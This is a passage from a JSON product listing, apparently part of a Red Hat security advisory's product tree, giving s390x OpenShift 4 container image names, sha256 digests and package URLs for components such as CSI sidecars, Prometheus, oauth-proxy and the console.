"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3Aeec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3A1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3A68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563562"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775629870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3Aaf94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3A70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604398"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3Ac16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3A470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606841"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606783"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3Acfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604596"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3Ae6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3Ac471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3Ab06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563881"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3A85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564691"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3Ad3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3A9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572688"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3Ad8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572927"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3Af4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3A8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606800"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3A0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775630129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3Ae6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3Acf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3Adae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3A720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3A2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3Aafbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572233"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3Abfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605796"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775578545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3A9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3Ab12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606714"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"product_identification_helper": {
